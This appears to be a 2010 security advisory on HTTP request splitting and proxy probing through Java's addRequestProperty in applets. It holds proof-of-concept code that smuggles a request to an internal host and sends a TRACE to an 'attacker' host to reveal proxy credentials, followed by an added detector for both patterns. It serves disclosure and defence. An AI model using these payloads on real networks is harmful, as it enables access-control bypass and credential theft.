Tuesday, October 12, 2010

Http Request Splitting and Header Abuse with Java AddRequestProperty

Summary
It is possible to abuse the method AddRequestProperty to:
  • inject new requests by abusing the request header Transfer-Encoding. The result is a well-known attack called HTTP Request Splitting [1][2][3].
  • gather information about the existence of an HTTP proxy.

Analysis
The applet sandbox allows requests to be made to the host the applet originated from by using the class java.net.URL. This is permitted by the Java same-origin policy (SOP).
Example:

var f = new Packages.java.net.URL("http://appletoriginatinghost/");
var g = f.openConnection();      // a java.net.HttpURLConnection
g.setRequestMethod("GET");       // no request body is written here, so no output stream is opened
g.connect();
var dis = new Packages.java.io.DataInputStream(g.getInputStream());

// echo the response line by line
var rl;
while ((rl = dis.readLine()) != null) {
    log(rl);
}


We found that it is possible to force a split of an HTTP request by using
Request.addRequestProperty("Transfer-Encoding", "chunked");

This could be used by a malicious user to bypass access controls when a
forward proxy is configured.

In fact, by setting the request header Transfer-Encoding: chunked,
the request body will be parsed as chunked according to RFC 2616:

var f = new Packages.java.net.URL("http://appletoriginatinghost/");
var g = f.openConnection();
g.setDoOutput(true);             // a request body will be written
g.setRequestMethod("GET");
g.addRequestProperty("Transfer-Encoding", "chunked");
var dis2 = new Packages.java.io.DataOutputStream(g.getOutputStream());
// the zero-length chunk terminates the chunked body; whatever follows it is
// read by the proxy as the start of a second request
dis2.writeBytes("0\n\nGET http://someinternalHost HTTP/1.1\nHost: 10.1.1.1\n\n");
dis2.flush();
dis2.close();
g.connect();
var dis = new Packages.java.io.DataInputStream(g.getInputStream());

var rl;
while ((rl = dis.readLine()) != null) {
    log(rl);
}



It can also be abused to obtain forward-proxy information, such as the proxy password, with a TRACE request whose Max-Forwards header is set to 0:

var f = new Packages.java.net.URL("http://attacker/");
var g = f.openConnection();
g.setRequestMethod("TRACE");
g.addRequestProperty("Max-Forwards", "0");   // the first proxy answers instead of forwarding

g.connect();
var dis = new Packages.java.io.DataInputStream(g.getInputStream());

// the original post is cut off at this point; the loop body below is a
// minimal completion that echoes the TRACE response
var i = 0, rl;
while (i < 350) {
    rl = dis.readLine();
    if (rl == null) break;
    log(rl);
    i++;
}
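As an added example that is not part of the original post, here is a defender-side check in JavaScript (Node) that a forward proxy or a log pipeline could apply to a raw request: it decodes a chunked body per RFC 2616 and reports the two patterns described above, a request line left after the terminating chunk and a TRACE with Max-Forwards: 0. The sample requests, host names and function names are constructed for this example.

```javascript
// Added example, not from the original post: decode a chunked body and flag the two
// patterns the post describes. The sample requests at the bottom are constructed.
function parseRequest(raw) {
  const sep = raw.includes('\r\n\r\n') ? '\r\n\r\n' : '\n\n'; // post's payload uses bare "\n"
  const idx = raw.indexOf(sep);
  const lines = (idx < 0 ? raw : raw.slice(0, idx)).split(/\r?\n/);
  const headers = {};
  for (const l of lines.slice(1)) {
    const c = l.indexOf(':');
    if (c > 0) headers[l.slice(0, c).trim().toLowerCase()] = l.slice(c + 1).trim();
  }
  return { method: lines[0].split(' ')[0], headers, body: idx < 0 ? '' : raw.slice(idx + sep.length) };
}

// Decode a chunked body (RFC 2616 3.6.1, trailers ignored) and return the bytes left after the
// zero-length chunk: a parser that stops there would read them as the start of a new request.
function decodeChunked(body) {
  let pos = 0, decoded = '';
  for (;;) {
    const nl = body.indexOf('\n', pos);
    if (nl < 0) throw new Error('truncated chunk-size line');
    const size = parseInt(body.slice(pos, nl).trim().split(';')[0], 16);
    if (Number.isNaN(size)) throw new Error('bad chunk size');
    if (size === 0) { // the blank line after the zero chunk closes the body
      const end = body.indexOf('\n', nl + 1);
      return { decoded, trailing: end < 0 ? '' : body.slice(end + 1) };
    }
    decoded += body.slice(nl + 1, nl + 1 + size);
    pos = body.indexOf('\n', nl + 1 + size) + 1; // skip the line break after the chunk data
    if (pos === 0) throw new Error('truncated chunk data');
  }
}

// Human-readable findings; an empty list means nothing suspicious was seen.
function auditRequest(raw) {
  const req = parseRequest(raw), findings = [];
  if ((req.headers['transfer-encoding'] || '').toLowerCase().includes('chunked')) {
    if (req.method === 'GET') findings.push('chunked body on GET');
    const m = /^([A-Z]+ \S+ HTTP\/\d\.\d)/m.exec(decodeChunked(req.body).trailing);
    if (m) findings.push('request line after final chunk: ' + m[1]);
  }
  if (req.method === 'TRACE' && req.headers['max-forwards'] === '0') findings.push('TRACE with Max-Forwards: 0');
  return findings;
}

// Constructed samples: the post's split payload, its TRACE probe, and a benign chunked POST.
const SPLIT_REQUEST = 'GET / HTTP/1.1\nHost: appletoriginatinghost\nTransfer-Encoding: chunked\n\n' +
  '0\n\nGET http://someinternalHost HTTP/1.1\nHost: 10.1.1.1\n\n';
const TRACE_REQUEST = 'TRACE / HTTP/1.1\nHost: attacker\nMax-Forwards: 0\n\n';
const BENIGN_POST = 'POST /up HTTP/1.1\r\nHost: h\r\nTransfer-Encoding: chunked\r\n\r\n5\r\nhello\r\n0\r\n\r\n';
```

Running auditRequest over each sample returns an empty list for the benign POST and one finding per pattern for the other two.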
